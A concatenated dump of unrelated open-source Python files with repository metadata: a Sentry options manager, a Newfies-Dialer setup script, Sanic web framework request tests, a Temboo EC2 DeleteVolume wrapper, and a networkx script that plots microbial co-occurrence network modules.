'QUEUE_GETMESSAGE_VISIBILITY_TIMEOUT']))
else:
self.log.info("* Project " + self.projectname + " returned False. Keeping message in the queue.")
self.log.info("=======================================")
except Exception as a:
print(a)
| apache-2.0 | -2,534,512,834,870,983,000 | 40.347222 | 124 | 0.535438 | false |
camilonova/sentry | src/sentry/options/manager.py | 1 | 4737 | """
sentry.options.manager
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import logging
from django.conf import settings
from django.utils import timezone
from hashlib import md5
from sentry.app import cache
from sentry.db.models.query import create_or_update
from sentry.models import Option
CACHE_FETCH_ERR = 'Unable to fetch option cache for %s'
CACHE_UPDATE_ERR = 'Unable to update option cache for %s'
class OptionsManager(object):
"""
A backend for storing generic configuration within Sentry.
Legacy Django configuration should be deprioritized in favor of more dynamic
configuration through the options backend, which is backed by a cache and a
database.
You **always** will receive a response to ``get()``. The response is eventually
consistent with the accuracy window depending on the queue workload and you
should treat all values as temporary as given a dual connection failure on both
the cache and the database the system will fall back to hardcoded defaults.
Overall this is a very loose consistency model which is designed to give simple
dynamic configuration with maximum uptime, where defaults are always taken from
constants in the global configuration.
- Values must be strings.
- Empty values are identical to null values which are represented by ''.
"""
cache = cache
logger = logging.getLogger('sentry.errors')
# we generally want to always persist
ttl = None
def __init__(self, cache=None, ttl=None, logger=None):
if cache is not None:
self.cache = cache
if ttl is not None:
self.ttl = ttl
if logger is not None:
self.logger = logger
def _make_cache_key(self, key):
return 'o:{0}'.format(md5(key).hexdigest())
def set(self, key, value):
"""
Set the value for an option. If the cache is unavailable the action will
still suceeed.
>>> from sentry import options
>>> options.set('option', 'value')
"""
create_or_update(
model=Option,
key=key,
defaults={
'value': value,
'last_updated': timezone.now(),
}
)
try:
self.update_cached_value(key, value)
except Exception as e:
self.logger.warn(CACHE_UPDATE_ERR, key, exc_info=True)
def get(self, key):
"""
Get the value of an option prioritizing the cache, then the database,
and finally the local configuration.
If no value is present for the key, an empty value ('') is returned.
>>> from sentry import options
>>> options.get('option')
"""
cache_key = self._make_cache_key(key)
try:
result = self.cache.get(cache_key)
except Exception as e:
self.logger.warn(CACHE_FETCH_ERR, key, exc_info=True)
result = None
cache_success = False
else:
cache_success = True
if result is None:
try:
result = Option.objects.get(key=key).value
except Option.DoesNotExist:
result = ''
except Exception as e:
self.logger.exception(unicode(e))
result = None
# we only attempt to populate the cache if we were previously
# able to successfully talk to the backend
if result is not None and cache_success:
try:
self.update_cached_value(key, result)
except Exception as e:
self.logger.warn(CACHE_UPDATE_ERR, key, exc_info=True)
if not result:
# default to the hardcoded local configuration for this key
result = settings.SENTRY_OPTIONS.get(key)
return result or ''
def delete(self, key):
"""
Permanently remove the value of an option.
This will also clear the value within the cache, which means a following
get() will result in a miss.
>>> from sentry import options
>>> options.delete('option')
"""
cache_key = self._make_cache_key(key)
Option.objects.filter(key=key).delete()
try:
self.cache.delete(cache_key)
except Exception as e:
self.logger.warn(CACHE_UPDATE_ERR, key, exc_info=True)
def update_cached_value(self, key, value):
cache_key = self._make_cache_key(key)
self.cache.set(cache_key, value, self.ttl)
| bsd-3-clause | 267,538,300,001,631,040 | 29.75974 | 83 | 0.608613 | false |
faddai/newfies-dialer | setup.py | 1 | 4242 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Newfies-Dialer License
# http://www.newfies-dialer.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2012 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
import os
from setuptools import setup, find_packages
from setuptools.dist import Distribution
import pkg_resources
import sys
import re
from newfies import VERSION
add_django_dependency = True
try:
pkg_resources.get_distribution('Django')
add_django_dependency = False
except pkg_resources.DistributionNotFound:
try:
import django
if django.VERSION[0] >= 1 and django.VERSION[1] >= 2 \
and django.VERSION[2] >= 0:
add_django_dependency = False
except ImportError:
pass
Distribution({'setup_requires': add_django_dependency
and ['Django >=1.3.0'] or []})
COMMANDS = {}
try:
from sphinx.setup_command import BuildDoc
COMMANDS['build_sphinx'] = BuildDoc
except ImportError:
pass
try:
from sphinx_pypi_upload import UploadDoc
COMMANDS['upload_sphinx'] = UploadDoc
except ImportError:
pass
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
(packages, data_files, temp_data_files, addons_data_files) = ([], [],
[], [])
(docs_data_files, resources_data_files) = ([], [])
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
def parse_requirements(file_name):
requirements = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'(\s*#)|(\s*$)', line):
continue
if re.match(r'\s*-e\s+', line):
requirements.append(re.sub(r'\s*-e\s+.*#egg=(.*)$', r'\1',
line))
elif re.match(r'(\s*git)|(\s*hg)', line):
pass
else:
requirements.append(line)
return requirements
def parse_dependency_links(file_name, install_flag=False):
dependency_links = []
for line in open(file_name, 'r').read().split('\n'):
if re.match(r'\s*-e\s+', line):
dependency_links.append(re.sub(r'\s*-e\s+', '', line))
if re.match(r'(\s*git)|(\s*hg)', line):
if install_flag == True:
line_arr = line.split('/')
line_arr_length = len(line.split('/'))
pck_name = line_arr[line_arr_length - 1].split('.git')
if len(pck_name) == 2:
os.system('pip install -f %s %s' % (pck_name[0],
line))
if len(pck_name) == 1:
os.system('pip install -f %s %s' % (pck_name, line))
return dependency_links
install_flag = False
if sys.argv[1] == 'install':
install_flag = True
setup(
name='newfies-dialer',
version=VERSION.replace(' ', '-'),
description='Newfies is a Bulk Dialer and Voice Broadcasting application '
'dedicated to provide information via phone technology.',
long_description=open('README.rst').read(),
author='Belaid Arezqui',
author_email='[email protected]',
url='http://www.newfies-dialer.org/',
download_url='https://github.com/Star2Billing/newfies-dialer'
'/tarball/master',
packages=find_packages(),
include_package_data=True,
license='MPL 2.0 License',
classifiers=[
'Development Status :: 1 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers, Users',
'License :: OSI Approved :: MPL 2.0 License',
'Operating System :: OS Independent',
'Programming Language :: Python, Javascript, HTML',
'Topic :: Voice Broadcast Software',
],
zip_safe=False,
install_requires=parse_requirements('install/conf/requirements.txt'),
dependency_links=parse_dependency_links('install/conf/requirements.txt',
install_flag),
setup_requires=['Django >= 1.3.0', 'Sphinx >= 0.4.2'],
cmdclass=COMMANDS,
)
| mpl-2.0 | 1,359,346,065,259,868,700 | 31.136364 | 78 | 0.603725 | false |
jrocketfingers/sanic | tests/test_requests.py | 1 | 7745 | from json import loads as json_loads, dumps as json_dumps
from urllib.parse import urlparse
import os
import ssl
import pytest
from sanic import Sanic
from sanic.exceptions import ServerError
from sanic.response import json, text
from sanic.testing import HOST, PORT
# ------------------------------------------------------------ #
# GET
# ------------------------------------------------------------ #
def test_sync():
app = Sanic('test_text')
@app.route('/')
def handler(request):
return text('Hello')
request, response = app.test_client.get('/')
assert response.text == 'Hello'
def test_text():
app = Sanic('test_text')
@app.route('/')
async def handler(request):
return text('Hello')
request, response = app.test_client.get('/')
assert response.text == 'Hello'
def test_headers():
app = Sanic('test_text')
@app.route('/')
async def handler(request):
headers = {"spam": "great"}
return text('Hello', headers=headers)
request, response = app.test_client.get('/')
assert response.headers.get('spam') == 'great'
def test_non_str_headers():
app = Sanic('test_text')
@app.route('/')
async def handler(request):
headers = {"answer": 42}
return text('Hello', headers=headers)
request, response = app.test_client.get('/')
assert response.headers.get('answer') == '42'
def test_invalid_response():
app = Sanic('test_invalid_response')
@app.exception(ServerError)
def handler_exception(request, exception):
return text('Internal Server Error.', 500)
@app.route('/')
async def handler(request):
return 'This should fail'
request, response = app.test_client.get('/')
assert response.status == 500
assert response.text == "Internal Server Error."
def test_json():
app = Sanic('test_json')
@app.route('/')
async def handler(request):
return json({"test": True})
request, response = app.test_client.get('/')
results = json_loads(response.text)
assert results.get('test') == True
def test_empty_json():
app = Sanic('test_json')
@app.route('/')
async def handler(request):
assert request.json == None
return json(request.json)
request, response = app.test_client.get('/')
assert response.status == 200
assert response.text == 'null'
def test_invalid_json():
app = Sanic('test_json')
@app.route('/')
async def handler(request):
return json(request.json)
data = "I am not json"
request, response = app.test_client.get('/', data=data)
assert response.status == 400
def test_query_string():
app = Sanic('test_query_string')
@app.route('/')
async def handler(request):
return text('OK')
request, response = app.test_client.get(
'/', params=[("test1", "1"), ("test2", "false"), ("test2", "true")])
assert request.args.get('test1') == '1'
assert request.args.get('test2') == 'false'
def test_uri_template():
app = Sanic('test_uri_template')
@app.route('/foo/<id:int>/bar/<name:[A-z]+>')
async def handler(request):
return text('OK')
request, response = app.test_client.get('/foo/123/bar/baz')
assert request.uri_template == '/foo/<id:int>/bar/<name:[A-z]+>'
def test_token():
app = Sanic('test_post_token')
@app.route('/')
async def handler(request):
return text('OK')
# uuid4 generated token.
token = 'a1d895e0-553a-421a-8e22-5ff8ecb48cbf'
headers = {
'content-type': 'application/json',
'Authorization': '{}'.format(token)
}
request, response = app.test_client.get('/', headers=headers)
assert request.token == token
token = 'a1d895e0-553a-421a-8e22-5ff8ecb48cbf'
headers = {
'content-type': 'application/json',
'Authorization': 'Token {}'.format(token)
}
request, response = app.test_client.get('/', headers=headers)
assert request.token == token
token = 'a1d895e0-553a-421a-8e22-5ff8ecb48cbf'
headers = {
'content-type': 'application/json',
'Authorization': 'Bearer Token {}'.format(token)
}
request, response = app.test_client.get('/', headers=headers)
assert request.token == token
# ------------------------------------------------------------ #
# POST
# ------------------------------------------------------------ #
def test_post_json():
app = Sanic('test_post_json')
@app.route('/', methods=['POST'])
async def handler(request):
return text('OK')
payload = {'test': 'OK'}
headers = {'content-type': 'application/json'}
request, response = app.test_client.post(
'/', data=json_dumps(payload), headers=headers)
assert request.json.get('test') == 'OK'
assert response.text == 'OK'
def test_post_form_urlencoded():
app = Sanic('test_post_form_urlencoded')
@app.route('/', methods=['POST'])
async def handler(request):
return text('OK')
payload = 'test=OK'
headers = {'content-type': 'application/x-www-form-urlencoded'}
request, response = app.test_client.post('/', data=payload, headers=headers)
assert request.form.get('test') == 'OK'
def test_post_form_multipart_form_data():
app = Sanic('test_post_form_multipart_form_data')
@app.route('/', methods=['POST'])
async def handler(request):
return text('OK')
payload = '------sanic\r\n' \
'Content-Disposition: form-data; name="test"\r\n' \
'\r\n' \
'OK\r\n' \
'------sanic--\r\n'
headers = {'content-type': 'multipart/form-data; boundary=----sanic'}
request, response = app.test_client.post(data=payload, headers=headers)
assert request.form.get('test') == 'OK'
@pytest.mark.parametrize(
'path,query,expected_url', [
('/foo', '', 'http://{}:{}/foo'),
('/bar/baz', '', 'http://{}:{}/bar/baz'),
('/moo/boo', 'arg1=val1', 'http://{}:{}/moo/boo?arg1=val1')
])
def test_url_attributes_no_ssl(path, query, expected_url):
app = Sanic('test_url_attrs_no_ssl')
async def handler(request):
return text('OK')
app.add_route(handler, path)
request, response = app.test_client.get(path + '?{}'.format(query))
assert request.url == expected_url.format(HOST, PORT)
parsed = urlparse(request.url)
assert parsed.scheme == request.scheme
assert parsed.path == request.path
assert parsed.query == request.query_string
assert parsed.netloc == request.host
@pytest.mark.parametrize(
'path,query,expected_url', [
('/foo', '', 'https://{}:{}/foo'),
('/bar/baz', '', 'https://{}:{}/bar/baz'),
('/moo/boo', 'arg1=val1', 'https://{}:{}/moo/boo?arg1=val1')
])
def test_url_attributes_with_ssl(path, query, expected_url):
app = Sanic('test_url_attrs_with_ssl')
current_dir = os.path.dirname(os.path.realpath(__file__))
context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain(
os.path.join(current_dir, 'certs/selfsigned.cert'),
keyfile=os.path.join(current_dir, 'certs/selfsigned.key'))
async def handler(request):
return text('OK')
app.add_route(handler, path)
request, response = app.test_client.get(
'https://{}:{}'.format(HOST, PORT) + path + '?{}'.format(query),
server_kwargs={'ssl': context})
assert request.url == expected_url.format(HOST, PORT)
parsed = urlparse(request.url)
assert parsed.scheme == request.scheme
assert parsed.path == request.path
assert parsed.query == request.query_string
assert parsed.netloc == request.host
| mit | -1,173,841,029,777,326 | 24.989933 | 80 | 0.58825 | false |
willprice/arduino-sphere-project | scripts/example_direction_finder/temboo/Library/Amazon/EC2/DeleteVolume.py | 5 | 4141 | # -*- coding: utf-8 -*-
###############################################################################
#
# DeleteVolume
# Deletes a volume using a volume id that you specify.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteVolume(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteVolume Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(DeleteVolume, self).__init__(temboo_session, '/Library/Amazon/EC2/DeleteVolume')
def new_input_set(self):
return DeleteVolumeInputSet()
def _make_result_set(self, result, path):
return DeleteVolumeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteVolumeChoreographyExecution(session, exec_id, path)
class DeleteVolumeInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteVolume
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
super(DeleteVolumeInputSet, self)._set_input('AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
super(DeleteVolumeInputSet, self)._set_input('AWSSecretKeyId', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)
"""
super(DeleteVolumeInputSet, self)._set_input('ResponseFormat', value)
def set_UserRegion(self, value):
"""
Set the value of the UserRegion input for this Choreo. ((optional, string) The AWS region that corresponds to the EC2 endpoint you wish to access. The default region is "us-east-1". See description below for valid values.)
"""
super(DeleteVolumeInputSet, self)._set_input('UserRegion', value)
def set_VolumeId(self, value):
"""
Set the value of the VolumeId input for this Choreo. ((required, string) The id of the volume to delete.)
"""
super(DeleteVolumeInputSet, self)._set_input('VolumeId', value)
class DeleteVolumeResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteVolume Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
"""
return self._output.get('Response', None)
class DeleteVolumeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteVolumeResultSet(response, path)
| gpl-2.0 | 9,148,499,344,192,354,000 | 39.598039 | 230 | 0.674475 | false |
richrr/scripts | python/plot-network-graph-june-22-backup.py | 1 | 15903 | import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
from utils import *
import brewer2mpl
import re
import os
import sys
import operator
from time import localtime, strftime
import argparse
import os.path
from subprocess import Popen, PIPE
from collections import defaultdict
import math
#python ~/scripts/python/plot-network-graph.py L3_invasive\ 0.310-randomwalk-test.sif L3_invasive\ 0.310\ node_attribute-randomwalk.txt out
#python ~/scripts/python/plot-network-graph.py -i L3_invasive\ 0.310\ edge_attribute-randomwalk.txt -n L3_invasive\ 0.310\ node_attribute-randomwalk.txt
#python ~/scripts/python/plot-network-graph.py -i L3_native\ 0.310\ edge_attribute-randomwalk.txt -n L3_native\ 0.310\ node_attribute-randomwalk.txt
def create_pretty_node_labels(G):
new_labels = dict()
for old_label in G.nodes():
cont = old_label.split("c__")
new_labels[old_label] = cont[-1] if len(cont) > 1 else cont[0] # UnassignedOtherOther -> cont[0]
tmp = new_labels[old_label]
new_labels[old_label] = tmp if len(tmp)<=5 else tmp[:5]
return new_labels
def preprocess_graph(edges, node_module_dict):
edges_between_nodes_from_same_module = list()
for (u,v) in edges:
#print u, "---->", v
if u in node_module_dict and v in node_module_dict:
if node_module_dict[u] == node_module_dict[v]:
edges_between_nodes_from_same_module.append((u,v))
else:
print "One or both nodes of the edge are missing from the attribute file"
# for nodes that do not have edges when inter module edges are removed
for (u,v) in edges:
u_present = [tup for tup in edges_between_nodes_from_same_module if u in tup]
if len(u_present) == 0:
edges_between_nodes_from_same_module.append((u,u))
v_present = [tup for tup in edges_between_nodes_from_same_module if v in tup]
if len(v_present) == 0:
edges_between_nodes_from_same_module.append((v,v))
return edges_between_nodes_from_same_module
def identify_node_categ(node_module_dict):
node_categ_dict = dict()
for node in node_module_dict:
start = 'p__'
end = 'c__'
result = node
if start in node and end in node:
result = re.search('%s(.*)%s' % (start, end), node).group(1)
node_categ_dict[node] = result
#print node, result
return node_categ_dict
def main(args):
parser = argparse.ArgumentParser(description='Plot networks obtained from MENA')
parser.add_argument('-i', '--infile') # file containing the edges (interactions between OTUs), can be sif or edge attribute file
parser.add_argument('-n', '--nodefile') # file containing the node attribute file
parser.add_argument('-o', '--outfilestr') # string for output filename
parser.add_argument('-l', '--logfile', default="ITS-log-file.txt") # log filename
parser.add_argument('-q', '--imagequality', default=600, type=int) # image quality dpi
parser.add_argument('-f', '--imageformat', default='pdf') # generate images in format. allowed: pdf, png, jpg, tiff
parser.add_argument('-y', '--outdir', default='./') # dir name for outputting figs.
parser.add_argument('-e', '--edgetypeoff', action='store_true', default=False) # do not distinguish positive and negative correlation edges
parser.add_argument('-d', '--delimiter', default='\t') # delimiter for file
args = parser.parse_args()
if args.infile == None or args.nodefile == None :
parser.print_help()
sys.exit('\natleast two arguments (edge file, node attributes file) required\n')
infile = args.infile
node_attrib_file = args.nodefile
outfilestring = infile.replace(' ','_')
if args.outfilestr != None:
outfilestring = args.outfilestr
outfilestring = args.outdir + outfilestring
img_qual = args.imagequality
img_frmt = args.imageformat
delim = args.delimiter
#http://www.discoveryplayground.com/computer-programming-for-kids/rgb-colors/
# purple, deep pink, red, orange, brown, wheat, yellow, forest green, cyan, blue
attrib_color_map = {'0' : '#a020f0' , '1' : '#ff1493', '2' : '#ff0000', '3' : '#ffa500' , \
'4' : '#a52a2a' , '5' : '#f5deb3', '6' : '#ffff00' , '7' : '#228b22' , '8' : '#00ffff' , '9' : '#0000ff'}
#Hot Pink,Violet,Purple,Brown,Salmon,Peru,Orange,Red,Tomato,Blue,Dodger Blue,Deep Sky Blue,Turquoise,Cyan,Light Cyan,Cadet Blue,Mint Cream,Azure,Alice Blue,Lavender,Lavender Blush,Misty Rose,Medium Aquamarine,Aquamarine,Dark Green,Dark Olive Green,Dark Sea Green,Yellow Green,Forest Green,Olive Drab,Dark Khaki,Khaki,Yellow,Light Gray,Green Yellow,Linen,Antique White,Antique White 2,Antique White 3,Antique White 4,Papaya Whip,Blanched Almond,Bisque,Bisque 2,Bisque 3,Bisque 4,Peach Puff,Peach Puff 2,Peach Puff 3,Peach Puff 4,Navajo White,Moccasin,Cornsilk,Cornsilk 2,Cornsilk 3,Cornsilk 4,Ivory,Seashell 2,Seashell 3,Seashell 4,Honeydew,Honeydew 2,Honeydew 3,Honeydew 4,Steel Blue,Light Steel Blue,Light Blue,Powder Blue
categ_color_map = {'Acidobacteria' : '#ff69b4','Actinobacteria' : '#ee82ee','Aquificae' : '#a020f0',\
'Armatimonadetes' : '#a52a2a','Bacteroidetes' : '#fa8072','Caldiserica' : '#cd853f','Chlamydiae' : '#ffa500',\
'Chlorobi' : '#ff0000','Chloroflexi' : '#ff6347','Chrysiogenetes' : '#0000ff','Cyanobacteria' : '#1e90ff',\
'Deferribacteres' : '#00bfff','Deinococcus-Thermus' : '#40e0d0','Dictyoglomi' : '#00ffff',\
'Elusimicrobia' : '#e0ffff','Fibrobacteres' : '#5f9ea0','Firmicutes' : '#f5fffa','Fusobacteria' : '#f0ffff',\
'Gemmatimonadetes' : '#f0f8ff','Lentisphaerae' : '#e6e6fa','Nitrospira' : '#fff0f5','Planctomycetes' : '#ffe4e1',\
'Proteobacteria' : '#66cdaa','Spirochaetes' : '#7fffd4','Synergistetes' : '#006400','Tenericutes' : '#556b2f',\
'Thermodesulfobacteria' : '#8fbc8f','Thermomicrobia' : '#9acd32','Thermotogae' : '#228b22','Verrucomicrobia' : '#6b8e23',\
'Crenarchaeota' : '#bdb76b','Euryarchaeota' : '#f0e68c','Korarchaeota' : '#ffff00','Nanoarchaeota' : '#d3d3d3',\
'Thaumarchaeota' : '#adff2f','[Parvarchaeota]' : '#faf0e6','[Caldithrix]' : '#faebd7','[Thermi]' : '#eedfcc','AD3' : '#cdc0b0','BHI80-139' : '#8b8378','BRC1' : '#ffefd5','FBP' : '#ffebcd','FCPU426' : '#ffe4c4','GAL15' : '#eed5b7','GN02' : '#cdb79e','GN04' : '#8b7d6b','GOUTA4' : '#ffdab9','Kazan-3B-28' : '#eecbad','MVP-21' : '#cdaf95','MVS-104' : '#8b7765','NC10' : '#ffdead','Nitrospirae' : '#ffe4b5','NKB19' : '#fff8dc','OD1' : '#eee8dc','OP11' : '#cdc8b1','OP3' : '#8b8878','SBR1093' : '#fffff0','SC4' : '#eee5de','SR1' : '#cdc5bf','TM6' : '#8b8682','TM7' : '#f0fff0','WPS-2' : '#e0eee0','WS2' : '#c1cdc1','WS3' : '#838b83','WS4' : '#4682b4','ZB3' : '#b0c4de','Other' : '#add8e6','UnassignedOtherOther' : '#b0e0e6'}
edge_color_map = {'0':'black', '1.000':'green' , '-1.000':'red'}
if args.edgetypeoff:
draw_plots_wout_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map, edge_color_map)
else:
draw_plots_with_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map, edge_color_map)
def get_edge_attributes(edges, edge_color_map):
edges_attrib_dict = dict()
if len(edges[0]) < 3:
sys.exit('\nedge attributes file required, not sif\n')
else:
for (u,v,w) in edges:
edge = (u,v)
edges_attrib_dict[edge] = edge_color_map[w] # the value is the color based on the edge weight
#if edge_color_map[w] == 'black':
# print edge, '--->', edge_color_map[w]
return edges_attrib_dict
def draw_plots_with_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map, edge_color_map):
G = nx.Graph()
# edges
edges = readColumnsSep(infile, ' ', 0, 2, 4)
edges_attrib_dict = get_edge_attributes(edges, edge_color_map)
edges_list = edges_attrib_dict.keys()
Gcolors = edges_attrib_dict.values()
#G.add_edges_from(edges_list) # this will only add edges but not the color info. which I might want later
for (u,v) in edges_list:
G.add_edge(u , v, color=edges_attrib_dict[(u,v)])
# node attributes
node_module_dict = readDict(node_attrib_file, 1, 7, '\t')
for node in node_module_dict:
G.add_node(node, moduleNumb = node_module_dict[node])
#print G.edges(data=True)
# preprocessed graph, edges only if both nodes are in same module
edges_between_nodes_from_same_module = preprocess_graph(edges_list, node_module_dict)
samModG = nx.Graph()
#samModG.add_edges_from(edges_between_nodes_from_same_module)
#samModG_edges_list = []
samModGcolors = []
for (u,v) in edges_between_nodes_from_same_module:
# for singleton nodes in module, dummy self edge was added to display on plot
color_ = ''
if (u,v) in edges_attrib_dict:
color_ = edges_attrib_dict[(u,v)]
elif u==v:
color_ = 'black'
samModG.add_edge(u , v, color=color_)
#samModG_edges_list.append()
samModGcolors.append(color_)
#print samModGcolors
# identify the category the OTU belongs to
node_categ_dict = identify_node_categ(node_module_dict)
for node in samModG.nodes():
samModG.add_node(node, category = node_categ_dict[node])
# reduce length of label for easier visualization
new_labels = create_pretty_node_labels(G)
# plot edges as per modules
#http://stackoverflow.com/questions/24662006/python-networkx-graph-different-colored-nodes-using-two-lists
nodeColor = [attrib_color_map[G.node[node]['moduleNumb']] for node in G if node != 'Name']
#http://stackoverflow.com/questions/22992009/legend-in-python-networkx
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in attrib_color_map:
if label in node_module_dict.values():# only show legend for values that are in my data
ax.plot([],[],'o',color=attrib_color_map[label],label=label)
for label in edge_color_map: # 0, 1, -1 correlation values
if edge_color_map[label] in Gcolors:# colors, only show legend for values that are in my data
ax.plot([],[],color=edge_color_map[label],label=label)
########### to do ######### calculate relative abundance of the node and make a list and submit as node_size to draw()
plt.title('OTUs colored as per modules. Intermodule edges allowed.')
nx.draw(G, edgelist=edges_list, edge_color = Gcolors, node_color = nodeColor, with_labels = False)#, style='dashed')
#nx.draw_circular(G, node_color = nodeColor, labels = new_labels, with_labels = True)
#plt.legend()
plt.legend(bbox_to_anchor=(0.05, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-all-edge-node-color-module.png", dpi = img_qual)
plt.clf()
# nodecolor as per the phyla
nodeColor = [categ_color_map[samModG.node[node]['category']] for node in samModG]
new_labels = create_pretty_node_labels(samModG)
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in categ_color_map:
if label in node_categ_dict.values():# only show legend for values that are in my data
ax.plot([],[],'o',color=categ_color_map[label],label=label)
for label in edge_color_map: # 0, 1, -1 correlation values
if edge_color_map[label] in samModGcolors:# colors, only show legend for values that are in my data
ax.plot([],[],color=edge_color_map[label],label=label)
plt.title('OTUs colored as per Phylum. Intermodule edges NOT allowed.')
# other layout algos: dot, neato, fdp, twopi, circo
algo = 'circo'
pos = nx.graphviz_layout(samModG, prog=algo)
nx.draw(samModG, edgelist=edges_between_nodes_from_same_module, edge_color = samModGcolors, pos=pos, node_color = nodeColor, labels = new_labels, with_labels = True)
#http://stackoverflow.com/questions/7125009/how-to-change-legend-size-with-matplotlib-pyplot
#http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.legend
#plt.legend(loc=3,prop={'size':6})
plt.legend(bbox_to_anchor=(0.15, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-same-module-edge-node-color-phyla." + img_frmt, dpi = img_qual)
plt.close()
def draw_plots_wout_edge_attributes(infile, node_attrib_file, outfilestring, img_qual, img_frmt, delim, attrib_color_map, categ_color_map,edge_color_map):
G = nx.Graph()
# edges
edges = readColumnsSep(infile, '\t', 0, 2)
G.add_edges_from(edges)
# node attributes
node_module_dict = readDict(node_attrib_file, 1, 7, '\t')
for node in node_module_dict:
G.add_node(node, moduleNumb = node_module_dict[node])
# preprocessed graph, edges only if both nodes are in same module
edges_between_nodes_from_same_module = preprocess_graph(edges, node_module_dict)
samModG = nx.Graph()
samModG.add_edges_from(edges_between_nodes_from_same_module)
# identify the category the OTU belongs to
node_categ_dict = identify_node_categ(node_module_dict)
for node in samModG.nodes():
samModG.add_node(node, category = node_categ_dict[node])
# reduce length of label for easier visualization
new_labels = create_pretty_node_labels(G)
# plot edges as per modules
#http://stackoverflow.com/questions/24662006/python-networkx-graph-different-colored-nodes-using-two-lists
nodeColor = [attrib_color_map[G.node[node]['moduleNumb']] for node in G if node != 'Name']
#http://stackoverflow.com/questions/22992009/legend-in-python-networkx
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in attrib_color_map:
if label in node_module_dict.values():# only show legend for values that are in my data
ax.plot([0],[0],color=attrib_color_map[label],label=label)
plt.title('OTUs colored as per modules. Intermodule edges allowed.')
nx.draw(G, node_color = nodeColor, with_labels = False)
#nx.draw_circular(G, node_color = nodeColor, labels = new_labels, with_labels = True)
#plt.legend()
plt.legend(bbox_to_anchor=(0.05, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-all-edge-node-color-module.png", dpi = img_qual)
plt.clf()
# nodecolor as per the phyla
nodeColor = [categ_color_map[samModG.node[node]['category']] for node in samModG]
new_labels = create_pretty_node_labels(samModG)
# create legend
f = plt.figure(1)
ax = f.add_subplot(1,1,1)
for label in categ_color_map:
if label in node_categ_dict.values():# only show legend for values that are in my data
ax.plot([0],[0],color=categ_color_map[label],label=label)
plt.title('OTUs colored as per Phylum. Intermodule edges NOT allowed.')
# other layout algos: dot, neato, fdp, twopi, circo
algo = 'circo'
pos = nx.graphviz_layout(samModG, prog=algo)
nx.draw(samModG, pos=pos, node_color = nodeColor, labels = new_labels, with_labels = True)
#http://stackoverflow.com/questions/7125009/how-to-change-legend-size-with-matplotlib-pyplot
#http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.legend
#plt.legend(loc=3,prop={'size':6})
plt.legend(bbox_to_anchor=(0.15, 0.93), loc=0, borderaxespad=0.,prop={'size':6}) #, title = "Legend"
plt.savefig(outfilestring + "-same-module-edge-node-color-phyla." + img_frmt, dpi = img_qual)
plt.close()
if __name__=='__main__':
datetime = strftime("%a, %d %b %Y %I:%M:%S %p", localtime())
cmd = 'echo ' + datetime
os.system(cmd)
main(sys.argv)
| gpl-3.0 | 4,652,235,010,529,054,000 | 50.3 | 727 | 0.661385 | false |
hefen1/chromium | tools/telemetry/telemetry/web_perf/metrics/layout_unittest.py | 12 | 1062 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
